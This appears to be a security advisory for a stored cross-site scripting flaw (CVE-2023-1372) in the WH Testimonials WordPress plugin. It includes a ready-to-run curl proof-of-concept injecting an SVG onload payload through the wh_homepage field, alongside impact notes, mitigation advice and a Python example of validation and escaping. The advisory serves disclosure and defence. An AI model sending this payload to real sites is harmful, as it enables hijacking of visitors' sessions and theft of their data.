CVE-2023-1372 - WH Testimonials <= 3.0.0 - Unauthenticated Stored Cross-Site Scripting
A stored XSS vulnerability has been identified in the WH Testimonials WordPress plugin. The vulnerable parameter is "wh_homepage", which is submitted via an HTTP POST request to the add testimonial functionality of the plugin.
WH Testimonials Plugin v3.0.0 is a popular WordPress plugin used to manage and display testimonials on websites. It provides several features to customize the layout of testimonials. However, a cross-site scripting (XSS) vulnerability has been discovered in the plugin, which can allow an attacker to inject malicious code and execute it in the context of the victim's browser.
The vulnerability is caused by insufficient validation of user-supplied input in the "wh_homepage" POST parameter. An attacker can inject malicious code into this parameter; the plugin stores it and later renders it, without output encoding, to victims who view the page where the testimonial is displayed.
Here's The Proof Of Concept
curl -X POST 'http://example.com/add/' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLKXxMfAqKI63OgZ4' \
  -H 'Host: example.com' \
  -d $'------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_clientname"\r\n\r\nFirst Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_company"\r\n\r\nLast Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_homepage"\r\n\r\n\"><svg/onload=prompt(/XSS/)>\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_short"\r\n\r\nShort Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_full"\r\n\r\nLong Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_sfimgurl"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="Wh_addnew"\r\n\r\nAdd Testimonial\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4--\r\n'
An attacker can exploit this vulnerability to steal sensitive information, such as cookies, session tokens, and other sensitive data. They can also perform unauthorized actions on behalf of the victim, such as modifying the victim's account settings, posting spam, or installing malware.
To exploit the vulnerability, an attacker crafts a request with the payload shown above and sends it to the vulnerable server. The server stores the payload and serves it to anyone who views the page where the testimonial is displayed, and the victim's browser executes the injected code. For example, the attacker can send a phishing email to the victim with a link to that page; when the victim follows the link, the injected code executes and the attacker can steal sensitive information.
To mitigate the vulnerability, the plugin developer should validate and sanitize user-supplied input before storing it, and should apply output encoding appropriate to the context (here, an HTML attribute) when rendering it, so that stored data can never be interpreted as markup. Additionally, site owners should keep their plugins and WordPress installation up to date so that known vulnerabilities cannot be exploited.
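A minimal illustration of the two-layer fix described above, added here as an example that is not the plugin's code: the homepage field is validated as an absolute http(s) URL on save and escaped for the attribute context when rendered, so the wh_homepage payload from the request above is rejected while a legitimate URL survives. The function names are hypothetical; in a real WordPress plugin, core's esc_url_raw(), esc_url() and esc_attr() fill these roles.

```python
import html
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample: the wh_homepage value from the PoC request on this page.
POC_PAYLOAD = '"><svg/onload=prompt(/XSS/)>'

ALLOWED_SCHEMES = {"http", "https"}


def render_homepage_vulnerable(homepage: str) -> str:
    """Renders the stored field into an href with no validation and no
    encoding: the pattern behind the stored XSS. The payload's leading
    '">' closes the attribute and tag, and the <svg> element follows."""
    return f'<a href="{homepage}">Homepage</a>'


def validate_homepage(value: str) -> Optional[str]:
    """Validation on save (hypothetical helper): accept only absolute
    http(s) URLs with a host, and reject characters that could break out
    of an attribute or a header. Returns the normalised URL or None."""
    value = value.strip()
    if len(value) > 2048 or any(c in value for c in '<>"\'\x00\r\n'):
        return None
    parts = urlsplit(value)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return parts.geturl()


def render_homepage_safe(homepage: str) -> str:
    """Output encoding: even a value that passed validation is escaped for
    the attribute context, so a future bypass in validate_homepage() would
    still not yield a working injection. Rejected values render nothing."""
    validated = validate_homepage(homepage)
    if validated is None:
        return ""
    return f'<a href="{html.escape(validated, quote=True)}">Homepage</a>'


if __name__ == "__main__":
    print(render_homepage_vulnerable(POC_PAYLOAD))
    print(render_homepage_safe(POC_PAYLOAD) or "<payload rejected>")
    print(render_homepage_safe("https://example.com/path?a=1&b=2"))
```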